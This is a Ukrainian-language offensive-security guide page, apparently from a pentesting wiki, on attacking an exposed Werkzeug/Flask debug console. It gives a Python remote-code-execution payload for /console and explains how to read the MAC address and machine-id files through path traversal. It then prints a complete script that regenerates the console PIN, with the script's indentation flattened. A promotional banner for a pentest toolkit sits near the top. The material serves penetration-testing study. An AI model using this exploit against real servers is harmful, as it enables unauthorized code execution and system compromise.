Werkzeug / Flask Debug

Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари

Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування атакуючої поверхні, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

Якщо налагодження активне, ви можете спробувати отримати доступ до /console і отримати RCE.

__import__('os').popen('whoami').read();

В інтернеті також є кілька експлойтів, таких як цей або один у metasploit.

Захищений PIN - Перехід по шляху

В деяких випадках /console кінцева точка буде захищена PIN-кодом. Якщо у вас є вразливість до переходу по файлах, ви можете витягти всю необхідну інформацію для генерації цього PIN-коду.

Експлойт PIN-коду консолі Werkzeug

Примусьте сторінку помилки налагодження в додатку, щоб побачити це:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

Повідомлення щодо сценарію "консоль заблокована" з'являється при спробі доступу до інтерфейсу налагодження Werkzeug, що вказує на необхідність введення PIN-коду для розблокування консолі. Пропонується експлуатувати PIN-код консолі, аналізуючи алгоритм генерації PIN-коду у файлі ініціалізації налагодження Werkzeug (__init__.py). Механізм генерації PIN-коду можна вивчити з репозиторію вихідного коду Werkzeug, хоча рекомендується отримати фактичний код сервера через вразливість обходу файлів через потенційні розбіжності версій.

Для експлуатації PIN-коду консолі потрібні два набори змінних: probably_public_bits та private_bits:

probably_public_bits

• username: Відноситься до користувача, який ініціював сесію Flask.

• modname: Зазвичай позначається як flask.app.

• getattr(app, '__name__', getattr(app.__class__, '__name__')): Зазвичай розв'язується в Flask.

• getattr(mod, '__file__', None): Представляє повний шлях до app.py у каталозі Flask (наприклад, /usr/local/lib/python3.5/dist-packages/flask/app.py). Якщо app.py не застосовується, спробуйте app.pyc.

private_bits

• uuid.getnode(): Отримує MAC-адресу поточної машини, з str(uuid.getnode()) перетворюючи її в десятковий формат.

• Щоб визначити MAC-адресу сервера, потрібно ідентифікувати активний мережевий інтерфейс, що використовується додатком (наприклад, ens3). У випадках невизначеності, використовуйте /proc/net/arp для знаходження ID пристрою, потім витягніть MAC-адресу з /sys/class/net/<device id>/address.

• Перетворення шістнадцяткової MAC-адреси в десяткову можна виконати, як показано нижче:

# Приклад MAC-адреси: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

• get_machine_id(): Об'єднує дані з /etc/machine-id або /proc/sys/kernel/random/boot_id з першим рядком /proc/self/cgroup після останнього слешу (/).

</details>

Після збору всіх необхідних даних, скрипт експлуатації може бути виконаний для генерації PIN-коду консолі Werkzeug:

Після збору всіх необхідних даних, скрипт експлуатації може бути виконаний для генерації PIN-коду консолі Werkzeug. Скрипт використовує зібрані `probably_public_bits` та `private_bits` для створення хешу, який потім підлягає подальшій обробці для отримання фінального PIN-коду. Нижче наведено код Python для виконання цього процесу:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)